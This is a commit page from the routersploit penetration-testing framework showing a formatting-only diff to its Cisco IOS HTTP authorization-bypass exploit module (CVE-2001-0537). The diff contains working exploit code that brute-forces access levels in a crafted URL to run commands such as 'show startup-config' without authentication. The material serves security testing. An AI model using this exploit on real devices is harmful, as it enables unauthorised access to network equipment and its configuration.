Skip to content

R
routersploit
Commit 097491e4 by Renos Stoikos Committed by GitHub
Options

PEP 8 

PEP 8
parent da066d62
Showing with 10 additions and 10 deletions
routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py
...@@ -15,16 +15,16 @@ class Exploit(exploits.Exploit): ...@@ -15,16 +15,16 @@ class Exploit(exploits.Exploit):
""" """
This exploit targets a vulnerability in the Cisco IOS HTTP Server. This exploit targets a vulnerability in the Cisco IOS HTTP Server.
By sending a GET request for the url "http://ip_address/level/{num}/exec/..", By sending a GET request for the url "http://ip_address/level/{num}/exec/..",
it is possible to bypass authentication and execute any command. it is possible to bypass authentication and execute any command.
Example: http://10.0.0.1/level/99/exec/show/startup/config Example: http://10.0.0.1/level/99/exec/show/startup/config
""" """
__info__ = { __info__ = {
'name': 'Cisco IOS HTTP Unauthorized Administrative Access', 'name': 'Cisco IOS HTTP Unauthorized Administrative Access',
'description': 'HTTP server for Cisco IOS 11.3 to 12.2 allows attackers ' 'description': 'HTTP server for Cisco IOS 11.3 to 12.2 allows attackers '
'to bypass authentication and execute arbitrary commands, ' 'to bypass authentication and execute arbitrary commands, '
'when local authorization is being used, by specifying a high access level in the URL.', 'when local authorization is being used, by specifying a high access level in the URL.',
'authors': [ 'authors': [
'Author', 'renos stoikos <rstoikos[at]gmail.com>'# routesploit module 'Author', 'renos stoikos <rstoikos[at]gmail.com>'# routesploit module
], ],
'references': [ 'references': [
'http://www.cvedetails.com/cve/cve-2001-0537', 'http://www.cvedetails.com/cve/cve-2001-0537',
...@@ -34,21 +34,21 @@ class Exploit(exploits.Exploit): ...@@ -34,21 +34,21 @@ class Exploit(exploits.Exploit):
], ],
} }
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port port = exploits.Option(80, 'Target port') # default port
show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config') show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config')
access_level = None access_level = None
@mute @mute
def check(self): def check(self):
for num in range(16, 100): for num in range(16, 100):
url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command) url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
response = http_request(method="GET", url=url) response = http_request(method="GET", url=url)
if response.status_code == 200: if response.status_code == 200:
self.access_level = num self.access_level = num
return True # target is vulnerable return True # target is vulnerable
return False # target is not vulnerable return False # target is not vulnerable
def run(self): def run(self):
if self.check(): if self.check():
print_success("Target is vulnerable") print_success("Target is vulnerable")
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment